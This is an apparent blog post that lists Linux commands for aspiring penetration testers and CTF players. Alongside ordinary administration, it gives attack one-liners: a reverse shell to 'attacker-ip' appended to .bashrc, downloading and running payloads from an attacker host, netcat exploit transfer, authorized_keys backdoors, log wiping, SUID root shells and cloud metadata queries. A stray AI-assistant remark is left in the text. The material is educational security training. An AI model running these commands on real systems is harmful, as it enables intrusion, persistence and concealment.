Essential Linux Administration Commands

  1. Introduction
  2. Why Pentesters Must Learn Linux
  3. Navigating the Filesystem
  4. Managing Files and Directories
  5. Users and Groups
  6. Permissions, SUID, and Ownership
  7. Process and Service Management
  8. Networking Essentials
  9. Searching Files and Information
  10. Privilege Escalation: Enumeration and Tricks
  11. Cron Jobs (Persistence & Escalation)
  12. Sensitive Files and Histories
  13. File Editing and Scripting
  14. Persistence via .bashrc
  15. Package Management (Debian)
  16. Log Files and Monitoring
  17. Disk and Filesystem Management
  18. Binary Capabilities (getcap)
  19. Shell Escaping
  20. Working with /tmp
  21. Downloading Files from the Internet
  22. Curl (HTTP Requests and Downloads)
  23. SSH (Secure Shell)
  24. SUID/SGID Binaries (Advanced Privilege Escalation)
  25. Final Thoughts

This post is a curated list of practical Linux commands and techniques that every aspiring penetration tester should know. It covers everything from file enumeration and privilege escalation to persistence and log analysis — the kind of stuff you’ll actually use in real-world scenarios and CTFs.

However, I’ll leave a link to a video series by NetworkChuck. I think it’s a great place to start if you are a complete beginner, and you can use this post more as a reference guide afterward. Watch it Here. This guide is built to be both a learning tool and a quick-access checklist like its been for me.

You’ll need Linux knowledge to:

  • Enumerate targets effectively
  • Maintain access and persistence
  • Escalate privileges from user to root
  • Modify system behavior and configs
  • Use and understand your own tools
pwd                      # Show current directory
ls                       # List files
ls -la                   # Long list with hidden files
cd /etc                  # Change directory
cd ~                     # Go to home
cd ..                    # Up one level
tree                     # (Optional) Visualize file structure

Install tree if needed:

sudo apt install tree
touch notes.txt          # Create file
mkdir recon              # Create directory
cp file.txt /tmp/        # Copy file
mv old.txt new.txt       # Rename or move
rm file.txt              # Remove file
rm -r folder/            # Remove folder
whoami                   # Current user
id                       # UID and group info
groups                   # Show groups
sudo adduser testuser    # Create user
sudo passwd testuser     # Set password
su username              # Switch user
sudo -l                  # Show sudo rights
ls -l                    # File permissions
chmod +x file.sh         # Make file executable
chmod 755 file.sh        # rwxr-xr-x
chmod u+s /bin/bash      # Add SUID
chown user:group file    # Change ownership

ps aux                   # Show running processes
top                      # Dynamic process list
htop                     # (Better process viewer)
kill PID                 # Kill process
killall name             # Kill by name
systemctl status ssh     # Service status
systemctl restart apache2

Install htop if needed:

sudo apt install htop
ip a                     # Interfaces
ip r                     # Routes
ss -tuln                 # Listening ports
ping -c 4 domain.com     # Test connectivity
dig domain.com           # DNS info
nslookup domain.com      # DNS info
traceroute domain.com    # Trace path
nmap -sV -p- target      # Port scan

Install nmap:

sudo apt install nmap

Absolutely — here’s your revised post with inline comments added using hashtags next to each command, explaining what they do. I’ve preserved the tone and structure:

find / -name "id_rsa" 2>/dev/null        # Search for private SSH keys
find / -perm -4000 2>/dev/null           # Find SUID binaries (possible priv esc)
grep -i "password" *.conf                # Search for passwords in config files
locate php.ini                           # Quickly find php.ini file
sudo updatedb                            # Update locate DB for faster searches
cat file.txt                             # Print file contents
less logfile.log                         # View file with scroll support
tail -f /var/log/syslog                  # Follow logs live (real-time monitoring)
uname -a                                 # Kernel version and system info
cat /proc/version                        # Kernel version (alternative)
lsb_release -a                           # OS release info
cat /etc/issue                           # Distro information
echo $PATH                               # Show current PATH environment
env                                      # Show all environment variables

Check $PATH for dangerous entries like . (current directory):

echo "/bin/sh" > /tmp/update             # Create malicious script
chmod +x /tmp/update                     # Make it executable
export PATH=/tmp:$PATH                   # Add /tmp to the beginning of PATH
cat /etc/crontab                         # View system-wide cron jobs
ls -la /etc/cron.*                       # List cron folders and files

Look for cron jobs that are:

  • World-writable
  • Owned by root
  • Run frequently

These are prime candidates for privilege escalation.

cat ~/.bash_history                      # User’s command history
cat ~/.ssh/id_rsa                        # Private SSH key (loot!)
cat ~/.mysql_history                     # MySQL history (may have creds)

These often contain credentials or useful artifacts for lateral movement.

nano file.txt                            # Simple text editor
vim file.txt                             # Advanced text editor

Simple script example:

#!/bin/bash
for i in {1..3}; do
  echo "Pentest time!"
done

Make it executable and run:

chmod +x script.sh                       # Make script executable
./script.sh                              # Execute the script
echo "bash -i >& /dev/tcp/attacker-ip/4444 0>&1" >> ~/.bashrc
# Adds reverse shell to bashrc — runs on new shell
sudo apt update                          # Update package list
sudo apt install net-tools              # Install net-tools (includes `ifconfig`)
sudo apt install nmap                   # Install nmap (network scanner)
which nmap                               # Show nmap binary path
whereis python3                          # Locate python3 binary and man pages
ls -lah /var/log                         # List log files with sizes
cat /var/log/auth.log                    # Authentication log (login attempts)
cat /var/log/syslog                      # System messages
cat /var/log/apache2/access.log          # Apache access logs
echo "" > /var/log/auth.log              # Clear logs (caution: may trigger alerts)
df -h                                    # Disk usage in human-readable format
du -sh *                                 # Disk usage of files/folders
mount                                    # Show mounted filesystems

This helps find mount points and disk space that could be manipulated for persistence.

getcap -r / 2>/dev/null                  # Find binaries with special capabilities

Look for capabilities like cap_setuid+ep — these can be abused similar to SUID.

To install the tool:

sudo apt install libcap2-bin             # Install getcap utility
python3 -c 'import pty; pty.spawn("/bin/bash")'  # Spawn interactive bash shell

Then press:

CTRL + Z                                 # Background current shell
stty raw -echo                           # Fix line discipline
fg                                       # Return to shell
export TERM=xterm                        # Set proper terminal type

This improves usability in restricted shells, especially reverse shells.

cd /tmp                                  # Change to tmp dir (world-writable)
wget http://attacker-ip/payload.sh      # Download script from attacker
chmod +x payload.sh                      # Make script executable
./payload.sh                             # Execute it

The /tmp directory is writable by all users — great for exploits and scripts.

wget http://attacker-ip/file                # Download a file using wget (simple and common on Linux systems)
curl -O http://attacker-ip/file            # Download a file using curl and keep the original filename

Attacker (serving file):

nc -lvnp 4444 < exploit.sh                 # Listen on port 4444 and serve exploit.sh to whoever connects

Victim (receiving file):

nc attacker-ip 4444 > exploit.sh           # Connect to attacker and write output to exploit.sh

Attacker:

python3 -m http.server 8000                # Starts a web server in the current directory on port 8000

Victim:

wget http://attacker-ip:8000/exploit.sh    # Pulls exploit.sh from the attacker's Python HTTP server
curl -O http://attacker-ip:8000/exploit.sh # Same using curl

📌 Python HTTP servers are fast and flexible for serving files in internal networks or CTFs. Just make sure the firewall allows the port you’re using (8000 by default).

curl (short for Client URL) is a command-line tool used to send and receive data using URLs. It’s one of the most useful utilities a pentester can have in their toolkit — not just for downloading payloads, but for interacting with web applications, APIs, and network services in a precise, controllable way.

Where tools like wget are great for simple file downloads, curl shines when you need to:

  • Send crafted HTTP requests (GET, POST, PUT, DELETE, etc.)
  • Add custom headers or cookies (great for bypassing filters or simulating browsers)
  • Test for common web vulnerabilities (like Host header injection or SSRF)
  • Pipe files directly in POST requests (exfil data or automate uploads)
  • Work with REST APIs or check web services during enumeration
  • Operate quietly in restricted environments

It’s also preinstalled on many Linux systems, making it ideal when you’re working on a target machine with limited tooling.

curl -O http://attacker-ip/payload.sh    # Download file (save with original name)
curl -o shell.sh http://attacker-ip/payload.sh   # Download and save as shell.sh
curl -X POST -d "username=admin&password=123" http://target/login.php
curl -H "X-Forwarded-For: 127.0.0.1" http://target/
curl -H "User-Agent: evil" http://target/
curl -b "PHPSESSID=abcdef123456" http://target/admin.php
curl -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"123"}' http://target/api/login
curl http://localhost:8080                # Web server check
curl -I http://target                     # Show HTTP headers (like response code, server info)
curl http://169.254.169.254/latest/meta-data/   # AWS metadata (very common in cloud attacks)
curl --proxy http://127.0.0.1:8080 http://target/

SSH is a protocol that lets you securely connect to remote machines over a network — it’s one of the most common ways pentesters move laterally, maintain access, or interact with compromised systems.

ssh user@hostname                      # Connect to a remote host by name
ssh user@192.168.1.10                  # Connect using IP address
ssh -p 2222 user@target                # Connect on a non-default port
ssh -i id_rsa user@target              # Connect using a specific private key file

Useful when you’ve found private keys on the system (like id_rsa from ~/.ssh or found via find).

scp file.txt user@host:/tmp/           # Copy a local file to a remote system
scp user@host:/etc/passwd .            # Copy a remote file to your local machine

Specify a non-default SSH port with -P:

scp -P 2222 file.txt user@host:/tmp/
ssh -L 8080:target:80 user@jumpbox     # Forward local port 8080 to target:80 via jumpbox

This is useful for pivoting through a jumpbox with limited network access.

If you have access to a user’s home directory, check these files for valuable info:

cat ~/.ssh/authorized_keys     # Public keys allowed for SSH login (good for persistence)
cat ~/.ssh/known_hosts         # Hosts this user has connected to (internal IPs, hostnames)
cat ~/.ssh/config              # Custom SSH client configs (may reveal internal hosts or identity files)

known_hosts can reveal internal network targets and potential pivot points.

  • Add your public key for persistence: echo "your_public_key" >> ~/.ssh/authorized_keys
  • Fix permissions on private keys before use: chmod 600 id_rsa
  • Crack encrypted private keys using john or ssh2john.py + john.
  • Use SSH agent forwarding for pivoting (cautiously): ssh -A user@jumpbox
  • Pivot via modern ProxyJump: ssh -J user@jumpbox user@target
  • Mount remote directories with SSHFS: sshfs user@host:/remote/path /local/mountpoint
  • Disable SSH timeout for long sessions: echo "ServerAliveInterval 60" >> ~/.ssh/config

SUID (Set User ID) and SGID (Set Group ID) binaries run with the privileges of their owner or group, not the user who executes them. This can be abused to escalate privileges if vulnerable binaries are found.

find / -perm -4000 -type f 2>/dev/null  # Find all SUID binaries (run as file owner)
find / -perm -2000 -type f 2>/dev/null  # Find all SGID binaries (run as file group)

Why It Matters

If you find a vulnerable SUID/SGID binary, you might be able to execute commands with elevated privileges (often root).

GTFOBins is a curated list of binaries that can be exploited when running with elevated privileges.

Example with nmap (if SUID and vulnerable):

which nmap
nmap --interactive
# In interactive mode, you can execute shell commands with elevated privileges
!sh

Other common SUID binaries to check:

  • find
  • vim or vi
  • less
  • awk
  • perl
  • python

Example exploitation with find:

find . -exec /bin/sh -p \;          # Spawn a root shell if find is SUID

Look for suspicious or world-writable SUID/SGID files:

ls -l /path/to/binary               # Check permissions and ownership
  • Always research the binary with GTFOBins before attempting exploitation.
  • Not every SUID binary is exploitable, but every SUID binary is worth investigating.
  • Abuse of SUID/SGID binaries is a common and reliable escalation vector in pentesting and CTFs.

If you’re serious about becoming a penetration tester, make this list your daily bread. Don’t just memorize commands — understand when and why to use them. Every line in this guide is something you’ll use in real-world assessments or CTF labs.

Use this post as:

  • A reference manual
  • A daily practice list
  • A checklist for privilege escalation

Hack ethically, learn relentlessly, and practice everything in real environments like TryHackMe or HackTheBox

Scroll to Top